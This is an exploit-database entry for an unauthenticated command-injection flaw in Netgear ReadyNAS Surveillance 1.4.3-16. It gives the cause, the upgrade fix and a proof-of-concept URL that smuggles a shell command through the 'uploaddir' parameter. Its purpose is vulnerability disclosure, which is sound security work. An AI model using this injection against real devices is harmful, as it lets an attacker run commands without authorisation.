header-logo
Suggest Exploit
vendor:
ReadyNAS Surveillance
by:
Kacper Szurek
9,8
CVSS
HIGH
Unauthenticated Remote Code Execution
78
CWE
Product Name: ReadyNAS Surveillance
Affected Version From: 1.4.3-16
Affected Version To: 1.4.3-16
Patch Exists: YES
Related CWE: N/A
CPE: a:netgear:readynas_surveillance:1.4.3-16
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE

$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.

Mitigation:

Upgrade to version 1.4.3-17 or later.
Source

Exploit-DB raw data:

# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
   
1. Description
  
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.

https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
 
2. Proof of Concept

http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27

Navigation

Suggest Exploit

Services By CQR